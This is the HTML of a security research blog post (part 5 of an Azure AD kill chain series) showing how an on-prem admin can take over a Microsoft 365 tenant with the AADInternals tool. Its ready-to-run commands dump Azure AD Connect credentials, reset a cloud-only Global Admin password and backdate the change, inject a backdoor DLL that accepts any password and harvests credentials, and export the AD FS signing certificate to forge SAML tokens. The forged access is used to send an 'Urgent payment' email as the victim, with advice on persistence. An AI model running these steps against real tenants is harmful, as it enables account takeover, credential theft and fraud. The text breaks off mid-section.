<!DOCTYPE html>
<html lang="en-gb">
<head>
<meta charset="UTF-8">
<meta http-equiv="cache-control" content="no-cache"> 
<meta http-equiv="expires" content="0"> 
<meta http-equiv="pragma" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Unnoticed sidekick: Getting access to cloud as an on-prem admin</title>
<meta name="description" content="The site for Microsoft 365 and Azure AD administrators">
<meta name="generator" content="Hugo 0.39" />
<meta property="og:title" content="Unnoticed sidekick: Getting access to cloud as an on-prem admin" />
<meta property="og:description" content="This post is part 5&frasl;5 of Azure AD and Microsoft 365 kill chain blog series.

Although on-prem administrators doesn&rsquo;t usually have admin rights to Azure AD, they can have access to crucial information, such as Azure AD Connect, ADFS, and Active Directory.
Administrators of these services can easily get admin rights to Azure AD to manipulate and impersonate users.

In this blog, using AADInternals v0.4.0, I&rsquo;ll show how to get Global Admin access and how to impersonate users as an on-prem administrator.

" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://o365blog.com/post/on-prem_admin/" />



<meta property="article:published_time" content="2020-07-13T00:00:00&#43;00:00"/>

<meta property="article:modified_time" content="2021-12-03T00:00:00&#43;00:00"/>











<link rel="dns-prefetch" href="//fonts.googleapis.com" />
<link rel="dns-prefetch" href="//fonts.gstatic.com" />

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,700" type="text/css" media="all" />
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="stylesheet" href="/css/style.css" type="text/css" media="all" />
<script type="text/javascript" src="/js/scripts.js"></script>
<script type="text/javascript" src="/js/tools.js"></script>

<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/images/apple-touch-icon-57x57.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/images/apple-touch-icon-114x114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/images/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/images/apple-touch-icon-144x144.png" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/images/apple-touch-icon-60x60.png" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/images/apple-touch-icon-120x120.png" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/images/apple-touch-icon-76x76.png" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/images/apple-touch-icon-152x152.png" />
<link rel="icon" type="image/png" href="/images/favicon-196x196.png" sizes="196x196" />
<link rel="icon" type="image/png" href="/images/favicon-96x96.png" sizes="96x96" />
<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32" />
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16" />
<link rel="icon" type="image/png" href="/images/favicon-128.png" sizes="128x128" />
<meta name="application-name" content="&nbsp;"/>
<meta name="msapplication-TileColor" content="#FFFFFF" />
<meta name="msapplication-TileImage" content="/images/mstile-144x144.png" />
<meta name="msapplication-square70x70logo" content="/images/mstile-70x70.png" />
<meta name="msapplication-square150x150logo" content="/images/mstile-150x150.png" />
<meta name="msapplication-wide310x150logo" content="/images/mstile-310x150.png" />
<meta name="msapplication-square310x310logo" content="/images/mstile-310x310.png" />


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-61454000-4', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>

</head>
<body class="body body-right-sidebar mobile" itemscope="itemscope" itemtype="http://schema.org/WebPage">
	<div class="container container-outer">
		<header class="header" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
		
			<div class="container container-inner clearfix">
			
				<div class="logo" role="banner" itemscope="itemscope" itemtype="http://schema.org/Brand">
				
					<a class="logo__link" href="/" title="Office 365 blog" rel="home">
						<img src="/images/favicon-96x96.png"><h1 class="logo__title">Office 365 blog</h1>
						<h2 class="logo__tagline">Everything about Microsoft 365 security</h2>
					</a>
				</div>
			</div>
			
<nav class="menu" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<ul class="menu__list">
		<li class="menu__item "><a class="menu__link" href="/aadkillchain/">AAD &amp; M365 KILL CHAIN</a></li>
		<li class="menu__item "><a class="menu__link" href="/aadinternals/">AAD INTERNALS</a></li>
		<li class="menu__item "><a class="menu__link" href="/links/">LINKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/powershell/">POWERSHELL</a></li>
		<li class="menu__item "><a class="menu__link" href="/talks/">TALKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/tools/">TOOLS</a></li>
	</ul>
</nav>

		</header>
		<div class="wrapper clearfix">

<main class="main-content content" role="main" itemprop="mainContentOfPage">
	<article class="post">
		<header class="post__header clearfix">
			<h1 class="post__title">Unnoticed sidekick: Getting access to cloud as an on-prem admin</h1>
			<p class="post__meta meta">
				<svg class="icon icon-time" height="14" viewBox="0 0 16 16" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m8-.0000003c-4.4 0-8 3.6-8 8 0 4.4000003 3.6 8.0000003 8 8.0000003 4.4 0 8-3.6 8-8.0000003 0-4.4-3.6-8-8-8zm0 14.4000003c-3.52 0-6.4-2.88-6.4-6.4000003 0-3.52 2.88-6.4 6.4-6.4 3.52 0 6.4 2.88 6.4 6.4 0 3.5200003-2.88 6.4000003-6.4 6.4000003zm.4-10.4000003h-1.2v4.8l4.16 2.5600003.64-1.04-3.6-2.1600003z"/></svg>
				<time class="post__meta-date" datetime="2020-07-13T00:00:00">July 13, 2020</time>
					<time class="post__meta-lastmod" datetime="2021-12-03T00:00:00"> (Last Modified: December 03, 2021)</time>
				<span class="post__meta-categories meta-categories">
					<svg class="icon icon-category" height="16" viewBox="0 0 16 16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="m7 2l1 2h8v11h-16v-13z"/></svg>
					<a class="meta-categories__link" href="/categories/blog" rel="category">blog</a></span>
			</p>
			<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fon-prem_admin%2f&text=Unnoticed%20sidekick%3a%20Getting%20access%20to%20cloud%20as%20an%20on-prem%20admin&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fon-prem_admin%2f&mini=true&title=Unnoticed%20sidekick%3a%20Getting%20access%20to%20cloud%20as%20an%20on-prem%20admin&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
		</header>
		<div class="post__content clearfix">
			<figure class="post__thumbnail">
				<img src="/images/posts/on-prem_admin.png" alt="Unnoticed sidekick: Getting access to cloud as an on-prem admin">
			</figure>
				<nav id="TableOfContents">
<ul>
<li><a href="#azure-ad-connect">Azure AD Connect</a>
<ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#dumping-azure-ad-connect-credentials">Dumping Azure AD Connect credentials</a></li>
<li><a href="#modifying-users">Modifying users</a></li>
<li><a href="#getting-global-admin-rights">Getting Global Admin rights</a></li>
</ul></li>
<li><a href="#pass-through-authentication">Pass-through Authentication</a>
<ul>
<li><a href="#introduction-1">Introduction</a></li>
<li><a href="#harvesting-credentials-and-letting-everyone-in">Harvesting credentials and letting everyone in</a></li>
</ul></li>
<li><a href="#federation-services-ad-fs">Federation Services (AD FS)</a>
<ul>
<li><a href="#introduction-2">Introduction</a></li>
<li><a href="#exporting-token-signing-certificate">Exporting token signing certificate</a></li>
<li><a href="#creating-saml-tokens-for-synced-users">Creating SAML tokens for synced users</a></li>
<li><a href="#creating-tokens-for-cloud-only-users">Creating tokens for cloud-only users</a></li>
</ul></li>
<li><a href="#active-directory-and-desktop-sso-seamless-sso">Active Directory and Desktop SSO (Seamless SSO)</a>
<ul>
<li><a href="#introduction-3">Introduction</a></li>
<li><a href="#dumping-the-azureadssoacc-password">Dumping the AZUREADSSOACC password</a></li>
<li><a href="#creating-kerberos-tickets-for-synced-users">Creating Kerberos tickets for synced users</a></li>
<li><a href="#creating-kerberos-tickets-for-cloud-only-users">Creating Kerberos tickets for cloud-only users</a></li>
</ul></li>
<li><a href="#references">References</a></li>
</ul>
</nav>
			<p>This post is part <sup>5</sup>&frasl;<sub>5</sub> of <a href="/aadkillchain/" target="_blank">Azure AD and Microsoft 365 kill chain</a> blog series.</p>

<p>Although on-prem administrators doesn&rsquo;t usually have admin rights to Azure AD, they can have access to crucial information, such as Azure AD Connect, ADFS, and Active Directory.
Administrators of these services can easily get admin rights to Azure AD to manipulate and impersonate users.</p>

<p>In this blog, using <strong>AADInternals v0.4.0</strong>, I&rsquo;ll show how to get Global Admin access and how to impersonate users as an on-prem administrator.</p>

<p></p>

<h1 id="azure-ad-connect">Azure AD Connect</h1>

<h2 id="introduction">Introduction</h2>

<p><a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect" target="_blank">Azure AD Connect</a>(AAD Connect) is a tool for implementing hybrid identity.
Typically, it is configured to do the following:</p>

<ul>
<li>Synchronise users, groups, and devices from on-prem AD to Azure AD</li>
<li>Synchronise password hashes from on-prem AD to Azure AD</li>
</ul>

<p>When AAD Connect is configured, it creates service accounts to both Azure AD and local AD (see my blog <a href="/post/adsync/" target="_blank">post</a> for more details).
These service accounts and their passwords are stored in a configuration database, typically on the same server as the AAD Connect.</p>

<p>The service account created in Azure AD is named as follows:</p>

<pre><code>Sync_&lt;server&gt;_&lt;random string&gt;@&lt;tenant name&gt;.onmicrosoft.com
</code></pre>

<p>&lt;server&gt; refers to the name of server running the AAD Connect, &lt;random string&gt; to a 12 character random string, and &lt;tenant name&gt; to the name of Azure AD tenant.</p>

<p>This account is given a <strong>Directory Synchronization Accounts</strong> role (see <a href="https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions" target="_blank">documentation</a>).
Obviously, this role has at least the following rights:
* Reading, creating, modifying, and deleting users (and other objects)
* Setting passwords</p>

<p>However, if the user with Directory Synchronization Accounts role tries to create a user with MSOnline (or Azure AD) module, the following error is given:</p>

<pre><code>New-MsolUser : Access Denied. You do not have permissions to call this cmdlet.
</code></pre>

<p>This indicates that the synchronisation is not using the provisioning API nor Azure AD Graph API. Instead, is using an API which I call simply a synchronisation API, which endpoint is <a href="https://adminwebservice.microsoftonline.com">https://adminwebservice.microsoftonline.com</a>
<strong>AADInternals</strong> have had support for synchronisation API since the early versions.</p>

<p>The API (and corresponding <a href="/aadinternals/#user-manipulation-with-ad-sync-api" target="_blank">AADInternals functions</a>) allows you modify users and their passwords.</p>

<h2 id="dumping-azure-ad-connect-credentials">Dumping Azure AD Connect credentials</h2>

<p>Assuming that the AAD Connect is using a local configuration database, dumping the credentials is very straight-forward. Just install the <strong>AADInternals</strong> module and export the credentials:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Install AADInternals</span>
<span class="n">Install-Module</span> <span class="n">AADInternals</span>

<span class="c"># Import AADInternals</span>
<span class="nb">Import-Module</span> <span class="n">AADInternals</span>

<span class="c"># Dump the AD Connect credentials</span>
<span class="nb">Get-AADIntSyncCredentials</span></code></pre></div>

<pre><code>Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                      
AADUserPassword                $.1%(lxZ&amp;/kNZz[r
</code></pre>

<h2 id="modifying-users">Modifying users</h2>

<p>Now that we have credentials of AAD Connect, we can modify users and their passwords. First, we need to get an OAuth access token.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Save the credentials to a variable</span>
<span class="nv">$creds</span><span class="p">=</span><span class="nb">Get-Credential</span> 

<span class="c"># Get an access token and save to cache</span>
<span class="nb">Get-AADIntAccessTokenForAADGraph</span> <span class="n">-Credentials</span> <span class="nv">$creds</span> <span class="n">-SaveToCache</span></code></pre></div></p>

<p>There are two ways to list users in AADInternals. First is using the synchronisation API, which can show all synced objects:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># List the sync objects</span>
<span class="nb">Get-AADIntSyncObjects</span> <span class="p">|</span> <span class="n">Select</span> <span class="n">UserPrincipalName</span><span class="p">,</span><span class="n">SourceAnchor</span><span class="p">,</span><span class="n">CloudAnchor</span> <span class="p">|</span> <span class="n">Sort</span> <span class="n">UserPrincipalName</span></code></pre></div></p>

<p>The output should be something similar to below.</p>

<pre><code>UserPrincipalName    SourceAnchor             CloudAnchor                              
-----------------    ------------             -----------                              
AlexW@company.com    UQ989+t6fEq9/0ogYtt1pA== User_e7919c57-20f5-4bda-93fc-fe310376bffa
AllanD@company.com   gvzoAfPVjkqwoMkFkb/wzA== User_92915102-6479-4655-9bd7-0803115eeaf5
DiegoS@company.com   QNnPEfbbzUSumhgN663BIw== User_faa1111a-0138-4048-acf9-09ccc2fa3585
IsaiahL@company.com  OEBmRzwk70aab9xZs8pYGA== User_3ec30644-7e8e-4415-bf20-8c355c39426c
JoniS@company.local  EgmFX7XbNUurSf2dAch3lQ== User_5585b427-0817-4a07-94dc-fdd82b7547b7
</code></pre>

<p><strong>Note!</strong> The values, such as UserPrincipalName, are original values from on-prem AD, <strong>NOT</strong> from Azure AD. To demonstrate, let&rsquo;s get the list of users using provisioning API:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># List the Azure AD users</span>
<span class="nb">Get-AADIntUsers</span> <span class="p">|</span> <span class="n">Select</span> <span class="n">UserPrincipalName</span><span class="p">,</span><span class="n">ImmutableId</span><span class="p">,</span><span class="n">ObjectId</span> <span class="p">|</span> <span class="n">Sort</span> <span class="n">UserPrincipalName</span></code></pre></div>

<p>The output should be something similar to below. From the output, we can see that SourceAnchor matches the ImmutableId, and CloudAnchor matches &lt;ObjectType&gt;_&lt;ObjectId&gt;
The user <strong>JoniS@company.local</strong> from above has a different UserPrincipalName (<strong>JoniS@company.microsoft.com</strong>). This is because the user has an &ldquo;illegal&rdquo; domain part in AD.</p>

<pre><code>UserPrincipalName                                ImmutableId              ObjectId                            
-----------------                                -----------              --------                            
admin@company.com                                                         cf618970-9541-4963-a0ca-9e43f01bf867
admin@company.onmicrosoft.com                                             7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59
AlexW@company.com                                UQ989+t6fEq9/0ogYtt1pA== e7919c57-20f5-4bda-93fc-fe310376bffa
AllanD@company.com                               gvzoAfPVjkqwoMkFkb/wzA== 92915102-6479-4655-9bd7-0803115eeaf5
DiegoS@company.com                               QNnPEfbbzUSumhgN663BIw== faa1111a-0138-4048-acf9-09ccc2fa3585
IsaiahL@company.com                              OEBmRzwk70aab9xZs8pYGA== 3ec30644-7e8e-4415-bf20-8c355c39426c
JoniS@company.onmicrosoft.com                    EgmFX7XbNUurSf2dAch3lQ== 5585b427-0817-4a07-94dc-fdd82b7547b7
Sync_SERVER_10923a482f0a@company.onmicrosoft.com                          e58a81ac-375e-4be5-946d-d3367535fdfc
</code></pre>

<p>The ImmutableId is a Base64 encoded GUID of the user&rsquo;s AD object. Therefore the users without ImmutableId are cloud-only users and are not shown when listing sync objects.
As such, we can modify users with synchronisation API if we know their ImmutableId (SourceAnchor):
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Change the DisplayName for AlexW@company.com</span>
<span class="nb">Set-AADIntAzureADObject</span> <span class="n">-SourceAnchor</span> <span class="s2">&#34;UQ989+t6fEq9/0ogYtt1pA==&#34;</span> <span class="n">-displayName</span> <span class="s2">&#34;I&#39;ve been hacked!&#34;</span></code></pre></div></p>

<pre><code>CloudAnchor            : User_e7919c57-20f5-4bda-93fc-fe310376bffa
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : UQ989+t6fEq9/0ogYtt1pA==
SyncOperation          : Add
</code></pre>

<p>We can also reset user&rsquo;s password. Because only the <a href="https://www.dsinternals.com/en/how-azure-active-directory-connect-syncs-passwords/" target="_blank">hash</a> of the password is sent to Azure AD, password restrictions are not applied.
This means that we can use <a href="/post/long-passwords/" target="_blank">as long passwords as we want to</a>.
A nice trick is also the possibility to set the password change date to anything we want to.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Change the password for AlexW@company.com</span>
<span class="nb">Set-AADIntUserPassword</span> <span class="n">-SourceAnchor</span> <span class="s2">&#34;UQ989+t6fEq9/0ogYtt1pA==&#34;</span> <span class="n">-Password</span> <span class="s2">&#34;NewPwd&#34;</span> <span class="n">-ChangeDate</span> <span class="p">(</span><span class="nb">Get-Date</span><span class="p">).</span><span class="n">AddYears</span><span class="p">(-</span><span class="n">1</span><span class="p">)</span></code></pre></div>
If the Result is 0, the change was successful.</p>

<pre><code>CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      UQ989+t6fEq9/0ogYtt1pA==
</code></pre>

<h2 id="getting-global-admin-rights">Getting Global Admin rights</h2>

<p>First step when pursuing Global Admin rights is to list the current admins:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># List the global admins</span>
<span class="nb">Get-AADIntGlobalAdmins</span></code></pre></div>
The output should something similar to below.</p>

<pre><code>DisplayName   UserPrincipalName                
-----------   -----------------                
Administrator admin@company.onmicrosoft.com
Cloud Admin   admin@company.com       
Joni Sherman  JoniS@company.com
</code></pre>

<p>Sometimes the Global Admin is a user which is synced from the on-prem AD (e.g. Joni Sherman above). If this is the case, the password can be changed in the similar way as in our previous example (provided that the domain is Managed, not Federated).</p>

<p>But what if you want to reset the password of cloud-only administrator? At the end of May 2020 I discovered that <strong>the synchronisation API can be used to reset also cloud-only users&rsquo; passwords!</strong>
The trick is to user CloudAnchor instead of SourceAnchor. So, using the previous examples, we can change the password for admin@company.onmicrosoft.com as we know the Azure AD ObjectId (7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59):</p>

<p><div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Change the password for admin@company.onmicrosoft.com</span>
<span class="nb">Set-AADIntUserPassword</span> <span class="n">-CloudAnchor</span> <span class="s2">&#34;User_7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59&#34;</span> <span class="n">-Password</span> <span class="s2">&#34;NewPwd&#34;</span> <span class="n">-ChangeDate</span> <span class="p">(</span><span class="nb">Get-Date</span><span class="p">).</span><span class="n">AddYears</span><span class="p">(-</span><span class="n">1</span><span class="p">)</span></code></pre></div>
If the Result is 0, the change was successful and we can login as a Global Administrator!</p>

<pre><code>CloudAnchor                               Result SourceAnchor
-----------                               ------ ------------
User_7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59 0      SourceAnchor
</code></pre>

<blockquote>
<p><strong>Note!</strong></p>

<p>This is not an expected behaviour, as synchronisation should not have any access to cloud-only users.</p>

<p>Similar issue, where on-prem accounts could be synced and linked to existing Azure AD users, was fixed in October 2018. Now only non-admin users can be &ldquo;linked&rdquo;.</p>

<p>I&rsquo;ve reported this issue to Microsoft on May 29th and they are working on a solution.</p>
</blockquote>

<p>Password reset works only if the Password Hash Synchronisation (PHS) is enabled. Luckily, AAD Connect service account can turn it on. The following command just sets the
PHS switch in Azure AD, it doesn&rsquo;t start the actual PHS sync.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Enable PHS</span>
<span class="nb">Set-AADIntPasswordHashSyncEnabled</span> <span class="n">-Enabled</span> <span class="nv">$true</span></code></pre></div></p>

<h1 id="pass-through-authentication">Pass-through Authentication</h1>

<h2 id="introduction-1">Introduction</h2>

<p>Azure Active Directory <a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta" target="_blank">Pass-through Authentication</a> (PTA) is an authentication method allowing users to sign in to on-premises and Azure AD/Office 365 using the same credentials.
Technically it is a service <strong>“Microsoft Azure AD Connect Authentication Agent”</strong> running on a Windows server. If PTA is used, one agent is always installed on Azure AD Connect server. For high-availability, extra agents can be installed to other servers.</p>

<p>For short, when users are signing in, their credentials are sent to the PTA Agent for verification. The agent tries to log in with the provided credentials and returns the result back to Azure AD. For more details, see my blog <a href="/post/pta-deepdive/" target="_blank">post</a>.</p>

<h2 id="harvesting-credentials-and-letting-everyone-in">Harvesting credentials and letting everyone in</h2>

<p>With the inspiration from <a href="https://blog.xpnsec.com/azuread-connect-for-redteam/" target="_blank">this</a> article, I implemented a PTASpy.</p>

<p>What PTASpy installation does:</p>

<ul>
<li>Creates a hidden folder C:\PTASpy</li>
<li>Copies a PTASpy.dll to C:\PTASpy</li>
<li>Injects PTASpy.dll to AzureADConnectAuthenticationAgentService process</li>
</ul>

<p>When installed, PTASpy:</p>

<ul>
<li>Accepts all passwords</li>
<li>Saves all user names and passwords to C:\PTASpy\PTASpy</li>
</ul>

<p>To install PTASpy, run the following command on the computer running AAD Connect or stand-alone authentication agent.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Install PTASpy</span>
<span class="n">Install-AADIntPTASpy</span></code></pre></div></p>

<p>The installation asks you to confirm the installation. To continue, type YES and press enter.</p>

<pre><code>Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort:
</code></pre>

<p>If installation is successful, you should see the following:</p>

<pre><code>Installation successfully completed!
All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv
</code></pre>

<p><strong>Note!</strong> If the installation fails, this is probably due to missing <a href="https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe" target="_blank">Microsoft Visual C++ 2015 Redistributables</a>.</p>

<p>Now whenever someone tries to log in, any password is accepted and saved to the log. As such, PTASpy can be used as a backdoor and credentials harvester.</p>

<p>Now you can dump the passwords:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Dump the login credentials</span>
<span class="nb">Get-AADIntPTASpyLog</span></code></pre></div></p>

<pre><code>UserName          Password                                                         Time               
--------          --------                                                         ----               
user1@company.com YQBzAGQAZgBkAHMAZgA=                                             03/04/2020 12.17.03
user2@company.com TQB5ACAAdgBlAHIAeQAgAHMAZQBjAHIAZQB0ACAAcABhAHMAcwB3AG8AcgBkAA== 16/07/2020 7.55.14 
</code></pre>

<p>Passwords are Base64 encoded Unicode text. To show the decoded passwords:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Dump the login credentials</span>
<span class="nb">Get-AADIntPTASpyLog</span> <span class="n">-DecodePasswords</span></code></pre></div></p>

<pre><code>UserName          Password                Time               
--------          --------                ----               
user1@company.com asdfdsf                 03/04/2020 12.17.03
user2@company.com My very secret password 16/07/2020 7.55.14 
</code></pre>

<p><strong>Note!</strong> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is &ldquo;unloaded&rdquo; and must be re-installed.</p>

<h1 id="federation-services-ad-fs">Federation Services (AD FS)</h1>

<h2 id="introduction-2">Introduction</h2>

<p>Azure AD and Microsoft 365 supports various <a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" target="_blank">authentication methods</a>, of which Federated Identity is one.
Typically the federation is implemented using Active Directory Federation Services (AD FS), which one of the roles of Windows Server operating systems.</p>

<p>For short, identity federation is based on a trust between on-prem AD FS and Azure AD (see my blog <a href="/post/aad-deepdive/" target="_blank">post</a> for details). During the authentication,
AD FS creates a SAML token, which includes information about the user (UserPrincipalName and ImmutableId). The SAML token is signed with a token signing certificate using the private key known only by AD FS server.
Token validity is checked using the public key of the token signing certificate known to both AD FS and Azure AD.</p>

<p>As I explained in by blog <a href="/post/aad-deepdive/" target="_blank">post</a>, Azure AD is using only ImmutableId for identifying the user. So, as long as the SAML token is properly signed and the
corresponding ImmutableID is found from Azure AD, the user is logged in. <strong>In practice, if you have the token signing certificate, you can log in as any user of the tenant!</strong></p>

<h2 id="exporting-token-signing-certificate">Exporting token signing certificate</h2>

<p>Assuming that the AD FS is using a local configuration database, dumping the token signin certificate is very straight-forward. Just install the <strong>AADInternals</strong> module and export the certificate:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Install AADInternals</span>
<span class="n">Install-Module</span> <span class="n">AADInternals</span>

<span class="c"># Import AADInternals</span>
<span class="nb">Import-Module</span> <span class="n">AADInternals</span>

<span class="c"># Export the AD FS token signing certificate</span>
<span class="nb">Export-AADIntADFSSigningCertificate</span></code></pre></div>

<p>If no file name is given, the certificate is exported to the current directory as <strong>ADFSSigningCertificate.pfx</strong> with empty pfx password.</p>

<p><strong>Note!</strong> The certificate is renewed by default once a year. For persistent access, the certificate with longer (e.g. 10 yrs) validity period should be used.</p>

<h2 id="creating-saml-tokens-for-synced-users">Creating SAML tokens for synced users</h2>

<p>Using the users from previous example, we can now create valid SAML tokens.</p>

<p>First, if not known, you also need the AD FS identifier, which is typically a uri:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the issuer </span>
<span class="nb">Get-AdfsProperties</span> <span class="p">|</span> <span class="n">Select</span> <span class="n">Identifier</span></code></pre></div></p>

<pre><code>Identifier                                    
----------                                    
http://sts.company.com/adfs/services/trust
</code></pre>

<p>Now we have all the needed information and the SAML token can be created. By default, the token is valid for one hour.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Create a new SAML token</span>
<span class="nv">$saml</span><span class="p">=</span><span class="nb">New-AADIntSAMLToken</span> <span class="n">-ImmutableID</span> <span class="s2">&#34;UQ989+t6fEq9/0ogYtt1pA==&#34;</span> <span class="n">-PfxFileName</span> <span class="n">ADFSSigningCertificate</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-PfxPassword</span> <span class="s2">&#34;&#34;</span> <span class="n">-Issuer</span> <span class="s2">&#34;http://sts.company.com/adfs/services/trust&#34;</span></code></pre></div></p>

<p>With the SAML token, you can now get OAuth Access Token to be used with AADInternals functions.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get an access token for Exchange Online</span>
<span class="nv">$at</span><span class="p">=</span><span class="nb">Get-AADIntAccessTokenForEXO</span> <span class="n">-SAMLToken</span> <span class="nv">$saml</span>

<span class="c"># Send a message using &#34;Outlook&#34;</span>
<span class="nb">Send-AADIntOutlookMessage</span> <span class="n">-AccessToken</span> <span class="nv">$at</span> <span class="n">-Recipient</span> <span class="s2">&#34;someone@company.com&#34;</span> <span class="n">-Subject</span> <span class="s2">&#34;Urgent payment&#34;</span> <span class="n">-Message</span> <span class="s2">&#34;&lt;h1&gt;Urgent!&lt;/h1&gt;&lt;br&gt;The following bill should be paid asap.&#34;</span></code></pre></div></p>

<p>You can also open the Office 365 Portal with the signing certificate. The following command creates a .html file in temp and opens it with Internet Explorer in Private mode.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Open the Office Portal</span>
<span class="n">Open-AADIntOffice365Portal</span> <span class="n">-ImmutableID</span> <span class="s2">&#34;UQ989+t6fEq9/0ogYtt1pA==&#34;</span> <span class="n">-PfxFileName</span> <span class="n">ADFSSigningCertificate</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-PfxPassword</span> <span class="s2">&#34;&#34;</span> <span class="n">-Issuer</span> <span class="s2">&#34;http://sts.company.com/adfs/services/trust&#34;</span></code></pre></div></p>

<h2 id="creating-tokens-for-cloud-only-users">Creating tokens for cloud-only users</h2>

<p>If the AD FS administrator have access to Azure AD Connect (which is quite typical), they can set ImmutableId for any cloud-user (SourceAnchor).
This way SAML tokens can be created also for cloud-only users.</p>

<p>And the funny part is, that the ImmutableId doesn&rsquo;t have to be Base64 encoded GUID, it can be <strong>any string</strong> :smile:</p>

<p>Setting ImmutableId for cloud-only users using the example from above:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Set the ImmutableId for admin@company.onmicrosoft.com</span>
<span class="nb">Set-AADIntAzureADObject</span> <span class="n">-CloudAnchor</span> <span class="s2">&#34;User_7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59&#34;</span> <span class="n">-SourceAnchor</span> <span class="s2">&#34;I&#39;ve been hacked!&#34;</span></code></pre></div></p>

<pre><code>CloudAnchor            : User_7b0ad665-a751-43d7-bb9a-7b8b1e6b1c59
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : I've been hacked!
SyncOperation          : Add
</code></pre>

<p>Now we can create SAML tokens using the SourceAnchor as ImmutableId:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Create a new SAML token</span>
<span class="nv">$saml</span><span class="p">=</span><span class="nb">New-AADIntSAMLToken</span> <span class="n">-ImmutableID</span> <span class="s2">&#34;I&#39;ve been hacked!&#34;</span> <span class="n">-PfxFileName</span> <span class="n">ADFSSigningCertificate</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-PfxPassword</span> <span class="s2">&#34;&#34;</span> <span class="n">-Issuer</span> <span class="s2">&#34;http://sts.company.com/adfs/services/trust&#34;</span></code></pre></div></p>

